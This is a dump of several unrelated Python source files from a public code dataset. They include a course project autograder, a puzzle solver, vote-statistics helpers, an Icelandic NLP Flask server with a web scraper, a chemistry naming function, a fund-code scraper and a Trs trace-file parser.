self.student_method)\n\n def test_case10(self):\n self.run_with_params(10, self.params, self.test_method, self.student_method)\n\nclass PartBTestCase(CaseRunner):\n \"\"\"Test Part B (localization and steering back to (0,0) )\n\n Attributes:\n test_method(func): Test function.\n student_method(func): Student submission function.\n params(dict): Test parameters.\n \"\"\"\n\n\n def setUp(self):\n \"\"\"Setup for each test case.\n \"\"\"\n\n if marsglider1Exc:\n raise marsglider1Exc\n\n self.test_method = self.simulator.simulate_with_steering\n self.student_method = marsglider.next_angle\n\n self.params = dict()\n self.params['part'] = 'B'\n\n def test_case01(self):\n self.run_with_params(1, self.params, self.test_method, self.student_method)\n\n def test_case02(self):\n self.run_with_params(2, self.params, self.test_method, self.student_method)\n\n def test_case03(self):\n self.run_with_params(3, self.params, self.test_method, self.student_method)\n\n def test_case04(self):\n self.run_with_params(4, self.params, self.test_method, self.student_method)\n\n def test_case05(self):\n self.run_with_params(5, self.params, self.test_method, self.student_method)\n\n def test_case06(self):\n self.run_with_params(6, self.params, self.test_method, self.student_method)\n\n def test_case07(self):\n self.run_with_params(7, self.params, self.test_method, self.student_method)\n\n def test_case08(self):\n self.run_with_params(8, self.params, self.test_method, self.student_method)\n\n def test_case09(self):\n self.run_with_params(9, self.params, self.test_method, self.student_method)\n\n def test_case10(self):\n self.run_with_params(10, self.params, self.test_method, self.student_method)\n\n\n\n# Only run all of the test automatically if this file was executed from the command line.\n# Otherwise, let Nose/py.test do it's own thing with the test cases.\nif __name__ == \"__main__\":\n cases = []\n if PART_A is True: cases.append(PartATestCase)\n if PART_B is True: cases.append(PartBTestCase)\n suites = [unittest.TestSuite(unittest.TestLoader().loadTestsFromTestCase(case)) for case in cases]\n\n total_passes = 0\n\n try:\n for i, suite in zip(list(range(1, 1+len(suites))), suites):\n print(\"====================\\nTests for Part {}:\".format(i))\n\n result = unittest.TestResult()\n suite.run(result)\n\n for x in result.errors:\n print(x[0], x[1])\n for x in result.failures:\n print(x[0], x[1])\n\n num_errors = len(result.errors)\n num_fails = len(result.failures)\n num_passes = result.testsRun - num_errors - num_fails\n total_passes += num_passes\n\n print(\"Successes: {}\\nFailures: {}\\n\".format(num_passes, num_errors + num_fails))\n\n #We cap the maximum score to 101 if they pass more than 12.5 test cases. \n overall_score = total_passes * CREDIT_PER_PASS\n except Exception as e:\n print(e)\n overall_score = 0\n if overall_score > 100:\n print(\"Score above 100:\", overall_score, \" capped to 101!\")\n overall_score = 101\n\n print(\"====================\\nOverall Score: {}\".format(overall_score))\n","sub_path":"7638/Projects/Mars Glider/testing_suite_full.py","file_name":"testing_suite_full.py","file_ext":"py","file_size_in_byte":31867,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"67"} +{"seq_id":"591582123","text":"import numpy as np\nimport copy\nlines=[]\nline=input()\nwhile (line!='end'):\n lines.append(line)\n line=input()\ngrid=[]\n\n\ngrid=np.zeros((3,len(lines),len(lines[0])))\n\nfor i in range(0,len(lines)):\n for j in range(0,len(lines[0])):\n if lines[i][j]=='#':\n grid[1,i,j]=1\n\ngridSides=[]\nfor i in [-1,0,1]:\n for j in[-1,0,1]:\n for k in [-1,0,1]:\n if i!=0 or j !=0 or k!=0:\n gridSides.append([i,j,k])\n\n\ndef check(g,i,j,k):\n if i>=0 and j>=0 and k>=0 and i 0:\n stats['reviews'] = {\n 'num_reviewed': num_reviewed,\n 'approval_rate': 100.0*num_approved/num_reviewed,\n 'up_rate': 100.0*recording_votes[0]/num_reviewed,\n 'down_rate': 100.0*recording_votes[1]/num_reviewed\n }\n\n if stats['up_votes'] is None:\n stats['up_votes'] = 0\n\n if stats['down_votes'] is None:\n stats['down_votes'] = 0\n\n if stats['num_approved'] is None:\n stats['num_approved'] = 0\n\n stats['net_vote'] = stats['up_votes'] - stats['down_votes']\n\n return stats\n\n\n# This assumes recording QCs\ndef build_qualitycontrol_stat_dict(queryset):\n\n if not queryset.exists():\n return {\n 'count': 0,\n 'approved': 0,\n 'good': 0,\n 'bad': 0,\n 'trash': 0,\n 'delete': 0,\n 'star': 0,\n 'net_vote': 0\n }\n\n approved = \\\n queryset.filter(approved=True)\n\n goods = queryset.filter(good__gte=1).aggregate(sum=Sum('good'))\n bads = queryset.filter(bad__gte=1).aggregate(sum=Sum('bad'))\n deletes = queryset.filter(trash=True)\n stars = queryset.filter(star__gte=1).aggregate(sum=Sum('star'))\n\n stats = {\n 'count': queryset.count(),\n 'approved': approved.count(),\n 'good': goods['sum'] if goods['sum'] is not None else 0,\n 'bad': bads['sum'] if bads['sum'] is not None else 0,\n 'trash': deletes.count(),\n 'delete': deletes.count(),\n 'star': stars['sum'] if stars['sum'] is not None else 0,\n }\n\n stats['net_vote'] = stats['good'] - stats['bad']\n\n return stats\n","sub_path":"corpora/corpus/aggregate.py","file_name":"aggregate.py","file_ext":"py","file_size_in_byte":4484,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"67"} +{"seq_id":"135817311","text":"#!/usr/bin/env python\n\"\"\"\n Reynir: Natural language processing for Icelandic\n\n Main module, URL scraper and web server\n\n Copyright (c) 2015 Vilhjalmur Thorsteinsson\n All rights reserved\n See the accompanying README.md file for further licensing and copyright information.\n\n This module is written in Python 3 for Python 3.4\n\n\"\"\"\n\nimport time\nfrom contextlib import closing\nfrom datetime import datetime\n\nimport re\nfrom bs4 import NavigableString\nfrom collections import OrderedDict, defaultdict\nfrom flask import Flask\nfrom flask import render_template, jsonify\nfrom flask import request\n\nfrom fastparser import Fast_Parser, ParseError, ParseForestPrinter, ParseForestDumper\nfrom grammar import Nonterminal\nfrom ptest import run_test, Test_DB\nfrom reducer import Reducer\nfrom scraper import Scraper\nfrom scraperdb import Scraper_DB, Person\nfrom settings import Settings, ConfigError\nfrom tokenizer import tokenize, TOK\n\n# Initialize Flask framework\n\napp = Flask(__name__)\n\nfrom flask import current_app\n\ndef debug():\n # Call this to trigger the Flask debugger on purpose\n assert current_app.debug == False, \"Don't panic! You're here by request of debug()\"\n\n# Current default URL for testing\n\nDEFAULT_URL = 'http://kjarninn.is/2015/04/mar-gudmundsson-segir-margskonar-misskilnings-gaeta-hja-hannesi-holmsteini/'\n# 'http://www.ruv.is//frett/flottamennirnir-matarlausir-i-einni-kos'\n\n# HTML tags that we explicitly don't want to look at\n\nexclude_tags = frozenset([\"script\", \"audio\", \"video\", \"style\"])\n\n# HTML tags that typically denote blocks (DIV-like), not inline constructs (SPAN-like)\n\nblock_tags = frozenset([\"p\", \"h1\", \"h2\", \"h3\", \"h4\", \"div\",\n \"main\", \"article\", \"header\", \"section\",\n \"table\", \"thead\", \"tbody\", \"tr\", \"td\", \"ul\", \"li\",\n \"form\", \"option\", \"input\", \"label\",\n \"figure\", \"figcaption\", \"footer\"])\n\nwhitespace_tags = frozenset([\"br\", \"img\"])\n\n\nclass TextList:\n\n \"\"\" Accumulates raw text blocks and eliminates unnecessary nesting indicators \"\"\"\n\n def __init__(self):\n self._result = []\n self._nesting = 0\n\n def append(self, w):\n if self._nesting > 0:\n self._result.append(\" [[ \" * self._nesting)\n self._nesting = 0\n self._result.append(w)\n\n def append_whitespace(self):\n if self._nesting == 0:\n # No need to append whitespace if we're just inside a begin-block\n self._result.append(\" \")\n\n def begin(self):\n self._nesting += 1\n\n def end(self):\n if self._nesting > 0:\n self._nesting -= 1\n else:\n self._result.append(\" ]] \")\n\n def result(self):\n return \"\".join(self._result)\n\n\ndef extract_text(soup, result):\n \"\"\" Append the human-readable text found in an HTML soup to the result TextList \"\"\"\n if soup:\n for t in soup.children:\n if type(t) == NavigableString:\n # Text content node\n result.append(t)\n elif isinstance(t, NavigableString):\n # Comment, CDATA or other text data: ignore\n pass\n elif t.name in whitespace_tags:\n # Tags that we interpret as whitespace, such as
and \n result.append_whitespace()\n elif t.name in block_tags:\n # Nested block tag\n result.begin() # Begin block\n extract_text(t, result)\n result.end() # End block\n elif t.name not in exclude_tags:\n # Non-block tag\n extract_text(t, result)\n\n\ndef process_url(url):\n \"\"\" Open a URL and process the returned response \"\"\"\n\n metadata = None\n body = None\n\n # Fetch the URL, returning a (metadata, content) tuple or None if error\n info = Scraper.fetch_url(url)\n\n if info:\n metadata, body = info\n if metadata is None:\n if Settings.DEBUG:\n print(\"No metadata\")\n metadata = dict(heading = \"\",\n author = \"\",\n timestamp = datetime.utcnow(),\n authority = 0.0)\n else:\n if Settings.DEBUG:\n print(\"Metadata: heading '{0}'\".format(metadata.heading))\n print(\"Metadata: author '{0}'\".format(metadata.author))\n print(\"Metadata: timestamp {0}\".format(metadata.timestamp))\n print(\"Metadata: authority {0:.2f}\".format(metadata.authority))\n metadata = vars(metadata) # Convert namedtuple to dict\n\n # Extract the text content of the HTML into a list\n tlist = TextList()\n extract_text(body, tlist)\n text = tlist.result()\n\n # Eliminate soft hyphen and zero-width space characters\n text = re.sub('\\u00AD|\\u200B', '', text)\n\n # Eliminate consecutive whitespace\n text = re.sub(r'\\s+', ' ', text)\n\n # Tokenize the resulting text, returning a generator\n # noinspection PyRedundantParentheses\n return (metadata, tokenize(text))\n\n\ndef profile(func, *args, **kwargs):\n \"\"\" Profile the processing of text or URL \"\"\"\n\n import cProfile as profile\n\n filename = 'Reynir.profile'\n\n pr = profile.Profile()\n result = pr.runcall(func, *args, **kwargs)\n pr.dump_stats(filename)\n\n return result\n\n\ndef parse(toklist, single, use_reducer, dump_forest = False, keep_trees = False):\n \"\"\" Parse the given token list and return a result dict \"\"\"\n\n # Count sentences\n num_sent = 0\n num_parsed_sent = 0\n total_ambig = 0.0\n total_tokens = 0\n sent = []\n sent_begin = 0\n\n # Accumulate parsed sentences in a text dump format\n trees = OrderedDict()\n\n with Fast_Parser(verbose = False) as bp: # Don't emit diagnostic messages\n\n version = bp.version\n rdc = Reducer(bp.grammar)\n\n for ix, t in enumerate(toklist):\n if t[0] == TOK.S_BEGIN:\n num_sent += 1\n sent = []\n sent_begin = ix\n elif t[0] == TOK.S_END:\n slen = len(sent)\n if slen:\n # Parse the accumulated sentence\n err_index = None\n num = 0 # Number of tree combinations in forest\n score = 0 # Reducer score of the best parse tree\n\n try:\n # Parse the sentence\n forest = bp.go(sent)\n if forest:\n num = Fast_Parser.num_combinations(forest)\n\n if single and dump_forest:\n # Dump the parse tree to parse.txt\n with open(\"parse.txt\", mode = \"w\", encoding= \"utf-8\") as f:\n print(\"Reynir parse tree for sentence '{0}'\".format(\" \".join(sent)), file = f)\n print(\"{0} combinations\\n\".format(num), file = f)\n if num < 10000:\n ParseForestPrinter.print_forest(forest, file = f)\n else:\n print(\"Too many combinations to dump\", file = f)\n\n if use_reducer and num > 1:\n # Reduce the resulting forest\n forest, score = rdc.go_with_score(forest)\n assert Fast_Parser.num_combinations(forest) == 1\n\n if Settings.DEBUG:\n print(ParseForestDumper.dump_forest(forest))\n\n num = 1\n\n except ParseError as e:\n forest = None\n # Obtain the index of the offending token\n err_index = e.token_index\n\n if Settings.DEBUG:\n print(\"Parsed sentence of length {0} with {1} combinations, score {2}{3}\"\n .format(slen, num, score,\n \"\\n\" + (\" \".join(s[1] for s in sent) if num >= 100 else \"\")))\n if num > 0:\n num_parsed_sent += 1\n # Calculate the 'ambiguity factor'\n ambig_factor = num ** (1 / slen)\n # Do a weighted average on sentence length\n total_ambig += ambig_factor * slen\n total_tokens += slen\n if keep_trees:\n # We want to keep the trees for further processing down the line:\n # reduce and dump the best tree to text\n if num > 1:\n # Reduce the resulting forest before dumping it to text format\n forest = rdc.go(forest)\n trees[num_sent] = ParseForestDumper.dump_forest(forest)\n\n # Mark the sentence beginning with the number of parses\n # and the index of the offending token, if an error occurred\n toklist[sent_begin] = TOK.Begin_Sentence(num_parses = num, err_index = err_index)\n elif t[0] == TOK.P_BEGIN:\n pass\n elif t[0] == TOK.P_END:\n pass\n else:\n sent.append(t)\n\n result = dict(\n version = version,\n tokens = toklist,\n tok_num = len(toklist),\n num_sent = num_sent,\n num_parsed_sent = num_parsed_sent,\n avg_ambig_factor = (total_ambig / total_tokens) if total_tokens > 0 else 1.0\n )\n\n # noinspection PyRedundantParentheses\n return (result, trees)\n\n\ndef create_name_register(result):\n \"\"\" Assemble a register of names and titles from the token list \"\"\"\n tokens = result[\"tokens\"]\n register = { }\n db = Scraper_DB()\n with closing(db.session) as session:\n for t in tokens:\n if t.kind == TOK.PERSON:\n gn = t.val\n for pn in gn:\n # Attempt to look up the name pn.name\n q = session.query(Person).filter_by(name = pn.name).all()\n titles = defaultdict(int)\n for p in q:\n # Collect and count the titles\n titles[p.title] += 1\n if sum(cnt >= 4 for cnt in titles.values()) >= 2:\n # More than one title with four or more instances:\n # reduce the choices to just those and decide based on length\n titles = { key: 0 for key, val in titles.items() if val >= 4 }\n if titles:\n # Pick the most popular title, or the longer one if two are equally popular\n title = sorted([(cnt, len(t), t) for t, cnt in titles.items()])[-1][2]\n # Add it to the register\n register[pn.name] = title\n session.commit()\n result[\"register\"] = register\n if Settings.DEBUG:\n print(\"Register is: {0}\".format(register))\n\n\n@app.route(\"/analyze\", methods=['POST'])\ndef analyze():\n \"\"\" Analyze text from a given URL \"\"\"\n\n url = request.form.get(\"url\", \"\").strip()\n use_reducer = not (\"noreduce\" in request.form)\n dump_forest = \"dump\" in request.form\n metadata = None\n # Single sentence (True) or contiguous text from URL (False)?\n single = False\n keep_trees = False\n\n t0 = time.time()\n\n if url.startswith(\"http:\") or url.startswith(\"https:\"):\n # Scrape the URL, tokenize the text content and return the token list\n metadata, generator = process_url(url)\n toklist = list(generator)\n # If this is an already scraped URL, keep the parse trees and update\n # the database with the new parse\n keep_trees = Scraper.is_known_url(url)\n else:\n # Tokenize the text entered as-is and return the token list\n # In this case, there's no metadata\n toklist = list(tokenize(url))\n single = True\n\n tok_time = time.time() - t0\n\n t0 = time.time()\n\n # result = profile(parse, toklist, single, use_reducer, dump_forest)\n result, trees = parse(toklist, single, use_reducer, dump_forest, keep_trees)\n\n # Add a name register to the result\n create_name_register(result)\n\n parse_time = time.time() - t0\n\n if keep_trees:\n # Save a new parse result\n if Settings.DEBUG:\n print(\"Storing a new parse tree for url {0}\".format(url))\n Scraper.store_parse(url, result, trees)\n\n result[\"metadata\"] = metadata\n result[\"tok_time\"] = tok_time\n result[\"parse_time\"] = parse_time\n\n # Return the tokens as a JSON structure to the client\n return jsonify(result = result)\n\n\ndef make_grid(w):\n \"\"\" Make a 2d grid from a flattened parse schema \"\"\"\n\n def make_schema(w):\n \"\"\" Create a flattened parse schema from the forest w \"\"\"\n\n def _part(w, level, suffix):\n \"\"\" Return a tuple (colheading + options, start_token, end_token, partlist, info)\n where the partlist is again a list of the component schemas - or a terminal\n matching a single token - or None if empty \"\"\"\n if w is None:\n # Epsilon node: return empty list\n return None\n if w.is_token:\n return ([ level ] + suffix, w.start, w.end, None, (w.terminal, w.token.text))\n # Interior nodes are not returned\n # and do not increment the indentation level\n if not w.is_interior:\n level += 1\n # Accumulate the resulting parts\n plist = [ ]\n ambig = w.is_ambiguous\n add_suffix = [ ]\n\n for ix, pc in enumerate(w.enum_children()):\n prod, f = pc\n if ambig:\n # Uniquely identify the available parse options with a coordinate\n add_suffix = [ ix ]\n\n def add_part(p):\n \"\"\" Add a subtuple p to the part list plist \"\"\"\n if p:\n if p[0] is None:\n # p describes an interior node\n plist.extend(p[3])\n elif p[2] > p[1]:\n # Only include subtrees that actually contain terminals\n plist.append(p)\n\n if isinstance(f, tuple):\n add_part(_part(f[0], level, suffix + add_suffix))\n add_part(_part(f[1], level, suffix + add_suffix))\n else:\n add_part(_part(f, level, suffix + add_suffix))\n\n if w.is_interior:\n # Interior node: relay plist up the tree\n return (None, 0, 0, plist, None)\n # Completed nonterminal\n assert w.is_completed\n assert w.nonterminal is not None\n return ([level - 1] + suffix, w.start, w.end, plist, w.nonterminal)\n\n # Start of make_schema\n\n if w is None:\n return None\n return _part(w, 0, [ ])\n\n # Start of make_grid\n\n if w is None:\n return None\n schema = make_schema(w)\n assert schema[1] == 0\n cols = [] # The columns to be populated\n NULL_TUPLE = tuple()\n\n def _traverse(p):\n \"\"\" Traverse a schema subtree and insert the nodes into their\n respective grid columns \"\"\"\n # p[0] is the coordinate of this subtree (level + suffix)\n # p[1] is the start column of this subtree\n # p[2] is the end column of this subtree\n # p[3] is the subpart list\n # p[4] is the nonterminal or terminal/token at the head of this subtree\n col, option = p[0][0], p[0][1:] # Level of this subtree and option\n\n if not option:\n # No option: use a 'clean key' of NULL_TUPLE\n option = NULL_TUPLE\n else:\n # Convert list to a frozen (hashable) tuple\n option = tuple(option)\n\n while len(cols) <= col:\n # Add empty columns as required to reach this level\n cols.append(dict())\n\n # Add a tuple describing the rows spanned and the node info\n assert isinstance(p[4], Nonterminal) or isinstance(p[4], tuple)\n if option not in cols[col]:\n # Put in a dictionary entry for this option\n cols[col][option] = []\n cols[col][option].append((p[1], p[2], p[4]))\n\n # Navigate into subparts, if any\n if p[3]:\n for subpart in p[3]:\n _traverse(subpart)\n\n _traverse(schema)\n # Return a tuple with the grid and the number of tokens\n return (cols, schema[2])\n\n\n@app.route(\"/parsegrid\", methods=['POST'])\ndef parse_grid():\n \"\"\" Show the parse grid for a particular parse tree of a sentence \"\"\"\n\n MAX_LEVEL = 32 # Maximum level of option depth we can handle\n txt = request.form.get('txt', \"\")\n parse_path = request.form.get('option', \"\")\n use_reducer = not (\"noreduce\" in request.form)\n\n # Tokenize the text\n tokens = list(tokenize(txt))\n\n # Parse the text\n with Fast_Parser(verbose = False) as bp: # Don't emit diagnostic messages\n err = dict()\n grammar = bp.grammar\n try:\n forest = bp.go(tokens)\n except ParseError as e:\n err[\"msg\"] = str(e)\n # Relay information about the parser state at the time of the error\n err[\"info\"] = None # e.info\n forest = None\n\n # Find the number of parse combinations\n combinations = 0 if forest is None else Fast_Parser.num_combinations(forest)\n score = 0\n\n if Settings.DEBUG:\n # Dump the parse tree to parse.txt\n with open(\"parse.txt\", mode = \"w\", encoding= \"utf-8\") as f:\n if forest is not None:\n print(\"Reynir parse tree for sentence '{0}'\".format(txt), file = f)\n print(\"{0} combinations\\n\".format(combinations), file = f)\n if combinations < 10000:\n ParseForestPrinter.print_forest(forest, file = f)\n else:\n print(\"Too many combinations to dump\", file = f)\n else:\n print(\"No parse available for sentence '{0}'\".format(txt), file = f)\n\n if forest is not None and use_reducer:\n # Reduce the parse forest\n forest, score = Reducer(grammar).go_with_score(forest)\n if Settings.DEBUG:\n print(ParseForestDumper.dump_forest(forest))\n\n # Make the parse grid with all options\n grid, ncols = make_grid(forest) if forest else ([], 0)\n # The grid is columnar; convert it to row-major\n # form for convenient translation into HTML\n # There will be as many columns as there are tokens\n nrows = len(grid)\n tbl = [ [] for _ in range(nrows) ]\n # Info about previous row spans\n rs = [ [] for _ in range(nrows) ]\n\n # The particular option path we are displaying\n if not parse_path:\n # Not specified: display the all-zero path\n path = [(0,) * i for i in range(1, MAX_LEVEL)]\n else:\n # Disassemble the passed-in path\n\n def toint(s):\n \"\"\" Safe conversion of string to int \"\"\"\n try:\n n = int(s)\n except ValueError:\n n = 0\n return n if n >= 0 else 0\n\n p = [ toint(s) for s in parse_path.split(\"_\") ]\n path = [tuple(p[0 : i + 1]) for i in range(len(p))]\n\n # This set will contain all option path choices\n choices = set()\n NULL_TUPLE = tuple()\n\n for gix, gcol in enumerate(grid):\n # gcol is a dictionary of options\n # Accumulate the options that we want do display\n # according to chosen path\n cols = gcol[NULL_TUPLE] if NULL_TUPLE in gcol else [] # Default content\n # Add the options we're displaying\n for p in path:\n if p in gcol:\n cols.extend(gcol[p])\n # Accumulate all possible path choices\n choices |= gcol.keys()\n # Sort the columns that will be displayed\n cols.sort(key = lambda x: x[0])\n col = 0\n for startcol, endcol, info in cols:\n assert isinstance(info, Nonterminal) or isinstance(info, tuple)\n if col < startcol:\n gap = startcol - col\n gap -= sum(1 for c in rs[gix] if c < startcol)\n if gap > 0:\n tbl[gix].append((gap, 1, \"\", \"\"))\n rowspan = 1\n if isinstance(info, tuple):\n cls = { \"terminal\" }\n rowspan = nrows - gix\n for i in range(gix + 1, nrows):\n # Note the rowspan's effect on subsequent rows\n rs[i].append(startcol)\n else:\n cls = { \"nonterminal\" }\n # Get the 'pure' name of the nonterminal in question\n assert isinstance(info, Nonterminal)\n info = info.name\n if endcol - startcol == 1:\n cls |= { \"vertical\" }\n tbl[gix].append((endcol-startcol, rowspan, info, cls))\n col = endcol\n ncols_adj = ncols - len(rs[gix])\n if col < ncols_adj:\n tbl[gix].append((ncols_adj - col, 1, \"\", \"\"))\n # Calculate the unique path choices available for this parse grid\n choices -= { NULL_TUPLE } # Default choice: don't need it in the set\n unique_choices = choices.copy()\n for c in choices:\n # Remove all shorter prefixes of c from the unique_choices set\n unique_choices -= { c[0:i] for i in range(1, len(c)) }\n # Create a nice string representation of the unique path choices\n uc_list = [ \"_\".join(str(c) for c in choice) for choice in unique_choices ]\n if not parse_path:\n # We are displaying the longest possible all-zero choice: find it\n i = 0\n while (0,) * (i + 1) in unique_choices:\n i += 1\n parse_path = \"_\".join([\"0\"] * i)\n\n #debug()\n\n return render_template(\"parsegrid.html\", txt = txt, err = err, tbl = tbl,\n combinations = combinations, score = score,\n choice_list = uc_list, parse_path = parse_path)\n\n\n@app.route(\"/addsentence\", methods=['POST'])\ndef add_sentence():\n \"\"\" Add a sentence to the test database \"\"\"\n sentence = request.form.get('sentence', \"\")\n # The sentence may be one that should parse and give us ideally one result tree,\n # or one that is wrong and should not parse, giving 0 result trees.\n should_parse = request.form.get('shouldparse', 'true') == 'true'\n result = False\n if sentence:\n try:\n with closing(Test_DB.open_db()) as db:\n result = db.add_sentence(sentence, target = 1 if should_parse else 0)\n except Exception as e:\n return jsonify(result = False, err = str(e))\n return jsonify(result = result)\n\n\n@app.route(\"/\")\ndef main():\n \"\"\" Handler for the main (index) page \"\"\"\n\n # Instantiate a dummy parser to access grammar info\n # (this does not cause repeated parsing of the grammar as it is cached in memory)\n bp = Fast_Parser(verbose = False)\n txt = request.args.get(\"txt\", None)\n if not txt:\n txt = DEFAULT_URL\n return render_template(\"main.html\", default_text = txt, grammar = bp.grammar)\n\n\n@app.route(\"/test\")\ndef test():\n \"\"\" Handler for a page of sentences for testing \"\"\"\n\n # Run test and show the result\n bp = Fast_Parser(verbose = False) # Don't emit diagnostic messages\n\n return render_template(\"test.html\", result = run_test(bp))\n\n\n# Flask handlers\n\n# noinspection PyUnusedLocal\n@app.errorhandler(404)\ndef page_not_found(e):\n \"\"\" Return a custom 404 error \"\"\"\n return 'Þessi vefslóð er ekki rétt', 404\n\n@app.errorhandler(500)\ndef server_error(e):\n \"\"\" Return a custom 500 error \"\"\"\n return 'Eftirfarandi villa kom upp: {}'.format(e), 500\n\n\n# Initialize the main module\n\ntry:\n # Read configuration file\n Settings.read(\"Reynir.conf\")\nexcept ConfigError as e:\n print(\"Configuration error: {0}\".format(e))\n quit()\n\nif Settings.DEBUG:\n print(\"Running Reynir with debug={0}, host={1}, db_hostname={2}\"\n .format(Settings.DEBUG, Settings.HOST, Settings.DB_HOSTNAME))\n\n\nif __name__ == \"__main__\":\n\n # Run a default Flask web server for testing if invoked directly as a main program\n\n # Additional files that should cause a reload of the web server application\n # Note: Reynir.grammar is automatically reloaded if its timestamp changes\n extra_files = [ 'Reynir.conf', 'Verbs.conf', 'Main.conf' ]\n\n # Run the Flask web server application\n app.run(debug=Settings.DEBUG, host=Settings.HOST, use_reloader=True,\n extra_files = extra_files)\n\nelse:\n\n # Running as a server module: force the grammar to be pre-loaded in to memory\n with Fast_Parser() as fp:\n pass\n\n","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":24854,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"67"} +{"seq_id":"493069755","text":"# Written by JP for HJK Group\n# Dpt of Chemical Engineering, MIT\n\nfrom structgen import *\nfrom molSimplify.Scripts.io import *\nimport argparse, sys, os, shutil, itertools, random\nimport pybel\n\ndef name_complex(core,ligs,ligoc,args):\n center = core.getAtom(0).symbol()\n name = center + '_'\n if args.oxstate:\n ox = str(args.oxstate)\n else:\n ox = \"0\"\n name += \"_ \" + str(ox)\n if args.spin:\n spin = str(args.spin)\n else:\n spin = \"0\"\n name += \"_ \" + str(spin)\n for i,lig in enumerate(ligs):\n names += '_' + str(lig[:3]) + '-' + str(ligoc[i])\n names += \"_\"+str(spin)\n return name\n\n","sub_path":"molSimplify/Scripts/namegen.py","file_name":"namegen.py","file_ext":"py","file_size_in_byte":643,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"67"} +{"seq_id":"433390683","text":"import requests\nimport re\n\nheaders = {\n 'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/67.0.3396.99 Safari/537.36'\n}\n\n\ndef get_info(url):\n html = requests.get(url, headers=headers)\n data = re.findall('var rankData = {datas:(.*),allRecord.*', html.text)\n data_list = eval(data[0])\n fund_code = []\n\n for i in range(0, len(data_list)):\n onefund_list = data_list[i].strip(',').split(',')\n fund_codes = onefund_list[0]\n fund_code.append(fund_codes)\n\n return fund_code\n\n","sub_path":"project/Review Crawer/fund/importFundCode.py","file_name":"importFundCode.py","file_ext":"py","file_size_in_byte":562,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"67"} +{"seq_id":"386052380","text":"\"\"\"Trs类型曲线文件支持\"\"\"\n\nfrom datetime import datetime\nfrom Logger import logger\nfrom inspector.trace.Trace import TraceSet, Trace, TraceSetAttribute\nimport struct\nimport typing\nimport numpy as np\n\n\ndef _unpack_num(b: bytes, l: int, f: bool, c: int):\n \"\"\"\n bytes->number解析\n\n :param l: int型字节长度,f=True时不起作用\n :param f: 是否为float类型\n :param c: 需要解析的数量\n :return: 解析后的数字元组\n \"\"\"\n if f:\n fmt = '<%sf' % c\n dtype = 'f'\n elif l == 4:\n fmt = '<%si' % c\n dtype = 'i'\n elif l == 2:\n fmt = '<%sh' % c\n dtype = 'h'\n elif l == 1:\n fmt = '%sb' % c\n dtype = 'b'\n else:\n raise Exception('Format error.')\n return np.array(struct.unpack(fmt, b), dtype=dtype)\n\n\ndef _unpack_u_int(b: bytes) -> int:\n length = len(b)\n if length == 1:\n return _unpack_u_int1(b)\n if length == 2:\n return _unpack_u_int2(b)\n if length == 2:\n return _unpack_u_int2(b)\n\n\ndef _unpack_u_int1(b: bytes) -> int:\n return struct.unpack('B', b)[0]\n\n\ndef _unpack_u_int2(b: bytes) -> int:\n return struct.unpack(' int:\n return struct.unpack(' float:\n return __unpack(' str:\n return str(b, encoding='utf8')\n\n\ndef _unpack_bool(b: bytes) -> bool:\n return __unpack('?', b)\n\n\ndef __unpack(fmt: str, b: bytes):\n return struct.unpack(fmt, b)[0]\n\n\nclass TrsTraceSetHeader(object):\n def __init__(self):\n self.nt = None # type:int # Number of traces\n self.ns = None # type:int # Number of samples per trace\n self.sc = None # type:TrsSampleCoding #Sample Coding (see table )\n self.ds = 0 # type:int # Length of cryptographic data included in trace\n self.ts = 0 # type:int # Title space reserved per trace\n self.gt = None # type:str # “trace” Global trace title\n self.dc = None # type:str # Description\n self.xo = 0 # type:int # Offset in X-axis for trace representation\n self.xl = None # type:str # Label of X-axis\n self.yl = None # type:str # Label of Y-axis\n self.xs = 1.0 # type:float # Scale value for X-axis\n self.ys = 1.0 # type:float # Scale value for Y-axis\n self.to = 0 # type:int # Trace offset for displaying trace numbers\n self.ls = 0 # type:int # Logarithmic scale\n self.rg = 0.0 # type:float # Range of the scope used to perform acquisition\n self.cl = 0.0 # type:float # Coupling of the scope used to perform acquisition\n self.os = 0.0 # type:float # Offset of the scope used to perform acquisition\n self.ii = 0.0 # type:float # Input impedance of the scope used to perform acquisition\n self.ai = None # type:str # Device ID of the scope used to perform acquisition\n self.ft = 0 # type:int # The type of filter used during acquisition\n self.ff = 0.0 # type:float # Frequency of the filter used during acquisition\n self.fr = 0.0 # type:float # Range of the filter used during acquisition\n self.eu = False # type:bool # External clock used\n self.et = 0.0 # type:float # External clock threshold\n self.em = 0 # type:int # External clock multiplier\n self.ep = 0 # type:int # External clock phase shift\n self.er = 0 # type:int # External clock resampler mask\n self.re = False # type:bool # External clock resampler enabled\n self.ef = 0.0 # type:float # External clock frequency\n self.eb = 0 # type:int # External clock time base\n\n def update(self, tag: bytes, value: bytes):\n if tag == TrsTraceSetHeaderConstant.NT:\n self.nt = _unpack_u_int4(value)\n elif tag == TrsTraceSetHeaderConstant.NS:\n self.ns = _unpack_u_int4(value)\n elif tag == TrsTraceSetHeaderConstant.SC:\n self.sc = TrsSampleCoding(_unpack_u_int1(value))\n elif tag == TrsTraceSetHeaderConstant.DS:\n self.ds = _unpack_u_int2(value)\n elif tag == TrsTraceSetHeaderConstant.TS:\n self.ts = _unpack_u_int1(value)\n elif tag == TrsTraceSetHeaderConstant.GT:\n self.gt = _unpack_str(value)\n elif tag == TrsTraceSetHeaderConstant.DC:\n self.dc = _unpack_str(value)\n elif tag == TrsTraceSetHeaderConstant.XO:\n self.xo = _unpack_u_int4(value)\n elif tag == TrsTraceSetHeaderConstant.XL:\n self.xl = _unpack_str(value)\n elif tag == TrsTraceSetHeaderConstant.YL:\n self.yl = _unpack_str(value)\n elif tag == TrsTraceSetHeaderConstant.XS:\n self.xs = _unpack_float(value)\n elif tag == TrsTraceSetHeaderConstant.YS:\n self.ys = _unpack_float(value)\n elif tag == TrsTraceSetHeaderConstant.TO:\n self.to = _unpack_u_int4(value)\n elif tag == TrsTraceSetHeaderConstant.LS:\n self.ls = _unpack_u_int1(value)\n elif tag == TrsTraceSetHeaderConstant.RG:\n self.rg = _unpack_float(value)\n elif tag == 